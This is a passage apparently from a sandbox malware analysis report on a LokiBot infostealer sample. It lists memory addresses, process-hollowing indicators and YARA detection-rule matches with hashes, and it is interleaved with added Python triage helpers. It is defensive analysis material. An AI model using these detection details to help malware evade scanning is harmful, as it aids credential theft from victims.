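    "Source: Process Memory Space: mPvIOxEZXJsdYp.exe PID: 7608, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown",
    "Source: 13.2.mPvIOxEZXJsdYp.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86",
]

if __name__ == "__main__":
    result = triage(SAMPLE_LINES)
    for key in sorted(result, key=str):
        e = result[key]
        regions = ", ".join(hex(r) for r in sorted(e["regions"])) or "-"
        print(f"process {key} ({e['image'] or '?'}): {sorted(e['rules'])} at {regions}")
    print("image-base hits:", hollowed_candidates(result))
```

Feed it the whole signature list and the output shrinks to one line per process (0: gunzipped.exe, 8 and 13: mPvIOxEZXJsdYp.exe, plus the PID-keyed whole-process scans), with the rule set and the regions each rule fired on; process 13 is the only one whose LokiBot hit is at the image base.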
                      Source: C:\Users\user\Desktop\gunzipped.exe | Code function: 0_2_0772FA30 NtUnmapViewOfSection
                      Source: C:\Users\user\Desktop\gunzipped.exe | Code function: 0_2_0772FA28 NtUnmapViewOfSection
                      Source: C:\Users\user\Desktop\gunzipped.exe | Code function: 0_2_00FAD2A4
                      Source: C:\Users\user\Desktop\gunzipped.exe | Code function: 0_2_077223E0
                      Source: C:\Users\user\Desktop\gunzipped.exe | Code function: 0_2_077220C8
                      Source: C:\Users\user\Desktop\gunzipped.exe | Code function: 0_2_07721688
                      Source: C:\Users\user\Desktop\gunzipped.exe | Code function: 0_2_07721450
                      Source: C:\Users\user\Desktop\gunzipped.exe | Code function: 0_2_07721441
                      Source: C:\Users\user\Desktop\gunzipped.exe | Code function: 0_2_077223D1
                      Source: C:\Users\user\Desktop\gunzipped.exe | Code function: 0_2_07720228
                      Source: C:\Users\user\Desktop\gunzipped.exe | Code function: 0_2_07720219
                      Source: C:\Users\user\Desktop\gunzipped.exe | Code function: 0_2_0772D1B8
                      Source: C:\Users\user\Desktop\gunzipped.exe | Code function: 0_2_0772D1A9
                      Source: C:\Users\user\Desktop\gunzipped.exe | Code function: 0_2_07723070
                      Source: C:\Users\user\Desktop\gunzipped.exe | Code function: 0_2_07723060
                      Source: C:\Users\user\Desktop\gunzipped.exe | Code function: 0_2_077210E0
                      Source: C:\Users\user\Desktop\gunzipped.exe | Code function: 0_2_077210D1
                      Source: C:\Users\user\Desktop\gunzipped.exe | Code function: 0_2_077220B8
                      Source: C:\Users\user\Desktop\gunzipped.exe | Code function: 0_2_07725F70
                      Source: C:\Users\user\Desktop\gunzipped.exe | Code function: 0_2_07725F61
                      Source: C:\Users\user\Desktop\gunzipped.exe | Code function: 0_2_0772EDF0
                      Source: C:\Users\user\Desktop\gunzipped.exe | Code function: 0_2_0772CD80
                      Source: C:\Users\user\Desktop\gunzipped.exe | Code function: 0_2_0772C942
                      Source: C:\Users\user\Desktop\gunzipped.exe | Code function: 0_2_0772C948
                      Source: C:\Users\user\Desktop\gunzipped.exe | Code function: 0_2_07724910
                      Source: C:\Users\user\Desktop\gunzipped.exe | Code function: 0_2_07724901
                      Source: C:\Users\user\Desktop\gunzipped.exe | Code function: 0_2_0772E9B8
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Code function: 8_2_02B9D2A4
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Code function: 8_2_0585D320
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Code function: 8_2_0585EF80
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Code function: 8_2_05852757
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Code function: 8_2_05852768
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Code function: 8_2_05850007
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Code function: 8_2_05850040
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Code function: 8_2_058523B0
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Code function: 8_2_0585D310
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Code function: 8_2_0585EF70
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Code function: 8_2_05852E80
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Code function: 8_2_072223E0
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Code function: 8_2_072220C8
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Code function: 8_2_0722E748
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Code function: 8_2_07221688
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Code function: 8_2_07221441
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Code function: 8_2_07221450
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Code function: 8_2_072223D1
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Code function: 8_2_07220228
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Code function: 8_2_07220219
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Code function: 8_2_0722D1A8
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Code function: 8_2_0722D1B8
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Code function: 8_2_07223060
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Code function: 8_2_07223070
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Code function: 8_2_072220B8
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Code function: 8_2_072210E0
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Code function: 8_2_072210D1
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Code function: 8_2_07225F6F
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Code function: 8_2_07225F70
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Code function: 8_2_0722CD80
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Code function: 8_2_0722EDF0
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Code function: 8_2_0722490F
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Code function: 8_2_07224910
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Code function: 8_2_0722C944
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Code function: 8_2_0722C948
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Code function: 8_2_0722E9B8
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Code function: 8_2_0742F580
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Code function: 8_2_0742EB18
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Code function: 8_2_074253B8
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Code function: 8_2_0742E290
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Code function: 8_2_074249F8
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Code function: 8_2_0742EFE0
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Code function: 8_2_0742D780
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Code function: 8_2_07426CA8
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Code function: 8_2_07426CB8
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Code function: 8_2_074253A7
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Code function: 8_2_07425110
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Code function: 8_2_07425120
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Code function: 8_2_074249EB
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Code function: 13_2_0040549C
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Code function: 13_2_004029D4
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Code function: String function: 0041219C appears 45 times
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Code function: String function: 00405B6F appears 42 times
                      Source: gunzipped.exe | Static PE information: invalid certificate
                      Source: gunzipped.exe, 00000000.00000002.1740512111.000000000A270000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs gunzipped.exe
                      Source: gunzipped.exe, 00000000.00000002.1739814239.000000000798C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamePowerShell.EXE.MUI vs gunzipped.exe
                      Source: gunzipped.exe, 00000000.00000002.1733685251.000000000100E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs gunzipped.exe
                      Source: gunzipped.exe, 00000000.00000002.1735179615.00000000048D4000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs gunzipped.exe
                      Source: gunzipped.exe | Binary or memory string: OriginalFilenameOae.exeX vs gunzipped.exe
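The five entries above compare the OriginalFilename field of an embedded VS_VERSIONINFO block with the name the sample was actually run under. Tyrone.dll and Oae.exe belong to no system component and point at an embedded or renamed module carried inside gunzipped.exe; clr.dll is the .NET runtime and is expected in the memory of any .NET process. The check itself is cheap to reproduce. The Python below is an added example, not code from the report or from Joe Sandbox: it scans a byte buffer (a file or a memory dump) for the UTF-16LE 'OriginalFilename' key, reads the DWORD-aligned value that follows it up to its NUL terminator (so it does not pick up stray trailing bytes like the '8', 'T' and 'X' shown in the entries above), and reports values that differ from the on-disk name. The buffer it runs on is constructed inline with a small helper that builds VS_VERSIONINFO String entries; it is not taken from the sample.

```python
"""Compare VS_VERSIONINFO OriginalFilename values with the name a binary runs under.

Added example, not code from the Joe Sandbox report.  It reproduces the idea
behind the report's "OriginalFilename... vs gunzipped.exe" entries on any byte
buffer: find the UTF-16LE 'OriginalFilename' key of a VS_VERSIONINFO String
structure, read the DWORD-aligned value that follows it, and report values
that differ from the on-disk name.  The sample buffer is constructed below.
"""
import struct

KEY = "OriginalFilename".encode("utf-16-le") + b"\x00\x00"


def _read_utf16z(buf, off):
    """Read a NUL-terminated UTF-16LE string starting at off (stops at the terminator)."""
    end = off
    while end + 1 < len(buf) and buf[end:end + 2] != b"\x00\x00":
        end += 2
    return buf[off:end].decode("utf-16-le", errors="replace")


def original_filenames(buf):
    """Every distinct OriginalFilename value in buf, in order of appearance."""
    found = []
    pos = buf.find(KEY)
    while pos != -1:
        off = pos + len(KEY)
        off += (-off) % 4  # String.Value starts on a DWORD boundary after szKey
        value = _read_utf16z(buf, off)
        if value and value not in found:
            found.append(value)
        pos = buf.find(KEY, pos + 2)
    return found


def name_mismatches(buf, on_disk_name):
    """OriginalFilename values that differ from the file name (Windows names are case-insensitive)."""
    wanted = on_disk_name.lower()
    return [v for v in original_filenames(buf) if v.lower() != wanted]


def build_string_entry(key, value):
    """Build one VS_VERSIONINFO String structure: wLength, wValueLength, wType, szKey, padding, Value."""
    k = key.encode("utf-16-le") + b"\x00\x00"
    v = value.encode("utf-16-le") + b"\x00\x00"
    pad = b"\x00" * ((-(6 + len(k))) % 4)
    # wValueLength counts UTF-16 characters including the terminator; wType 1 = text data.
    return struct.pack("<HHH", 6 + len(k) + len(pad) + len(v), len(v) // 2, 1) + k + pad + v


def _pad4(b):
    """Pad so the next structure starts on a DWORD boundary, as the resource compiler does."""
    return b + b"\x00" * ((-len(b)) % 4)


# Constructed sample: a stub header followed by String entries like those a real
# version resource carries.  Two names disagree with the file name, one agrees.
SAMPLE_BUFFER = _pad4(b"MZ" + b"\x00" * 62)
for _key, _value in [("OriginalFilename", "Tyrone.dll"),
                     ("CompanyName", "Example Corp"),
                     ("OriginalFilename", "Oae.exe"),
                     ("OriginalFilename", "GUNZIPPED.EXE")]:
    SAMPLE_BUFFER = _pad4(SAMPLE_BUFFER + build_string_entry(_key, _value))

if __name__ == "__main__":
    print("OriginalFilename values:", original_filenames(SAMPLE_BUFFER))
    print("mismatches vs gunzipped.exe:", name_mismatches(SAMPLE_BUFFER, "gunzipped.exe"))
```

Run against a dropped file, pass the bytes of the file and its own name; run against a process dump, pass the dump and the image name of the process. A mismatch is not proof of malice on its own (renamed legitimate tools and embedded resources trigger it too), but a name such as Tyrone.dll inside a file called gunzipped.exe is exactly the kind of discrepancy worth surfacing early in triage.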
                      Source: gunzipped.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 8.2.mPvIOxEZXJsdYp.exe.4a46818.5.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: 8.2.mPvIOxEZXJsdYp.exe.4a46818.5.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 8.2.mPvIOxEZXJsdYp.exe.4a46818.5.raw.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                      Source: 8.2.mPvIOxEZXJsdYp.exe.4a46818.5.raw.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                      Source: 8.2.mPvIOxEZXJsdYp.exe.4a46818.5.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifacts observed in infostealers
                      Source: 8.2.mPvIOxEZXJsdYp.exe.4a2c7f8.6.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: 8.2.mPvIOxEZXJsdYp.exe.4a2c7f8.6.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 8.2.mPvIOxEZXJsdYp.exe.4a2c7f8.6.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                      Source: 8.2.mPvIOxEZXJsdYp.exe.4a2c7f8.6.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                      Source: 13.2.mPvIOxEZXJsdYp.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: 13.2.mPvIOxEZXJsdYp.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 13.2.mPvIOxEZXJsdYp.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                      Source: 13.2.mPvIOxEZXJsdYp.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                      Source: 13.2.mPvIOxEZXJsdYp.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifacts observed in infostealers
                      Source: 8.2.mPvIOxEZXJsdYp.exe.4a2c7f8.6.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: 8.2.mPvIOxEZXJsdYp.exe.4a2c7f8.6.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 8.2.mPvIOxEZXJsdYp.exe.4a2c7f8.6.raw.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                      Source: 8.2.mPvIOxEZXJsdYp.exe.4a2c7f8.6.raw.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                      Source: 8.2.mPvIOxEZXJsdYp.exe.4a2c7f8.6.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifacts observed in infostealers
                      Source: 0.2.gunzipped.exe.47d96c8.9.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: 0.2.gunzipped.exe.47d96c8.9.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 0.2.gunzipped.exe.47d96c8.9.raw.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                      Source: 0.2.gunzipped.exe.47d96c8.9.raw.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                      Source: 0.2.gunzipped.exe.47d96c8.9.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifacts observed in infostealers
                      Source: 0.2.gunzipped.exe.47d96c8.9.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: 0.2.gunzipped.exe.47d96c8.9.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 0.2.gunzipped.exe.47d96c8.9.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                      Source: 0.2.gunzipped.exe.47d96c8.9.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                      Source: 0.2.gunzipped.exe.47f36e8.8.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: 0.2.gunzipped.exe.47f36e8.8.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 0.2.gunzipped.exe.47f36e8.8.raw.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                      Source: 0.2.gunzipped.exe.47f36e8.8.raw.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                      Source: 0.2.gunzipped.exe.47f36e8.8.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifacts observed in infostealers
                      Source: 8.2.mPvIOxEZXJsdYp.exe.4a46818.5.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: 8.2.mPvIOxEZXJsdYp.exe.4a46818.5.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 8.2.mPvIOxEZXJsdYp.exe.4a46818.5.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                      Source: 8.2.mPvIOxEZXJsdYp.exe.4a46818.5.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                      Source: 13.2.mPvIOxEZXJsdYp.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: 13.2.mPvIOxEZXJsdYp.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 13.2.mPvIOxEZXJsdYp.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                      Source: 13.2.mPvIOxEZXJsdYp.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                      Source: 13.2.mPvIOxEZXJsdYp.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifacts observed in infostealers
                      Source: 0.2.gunzipped.exe.47f36e8.8.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
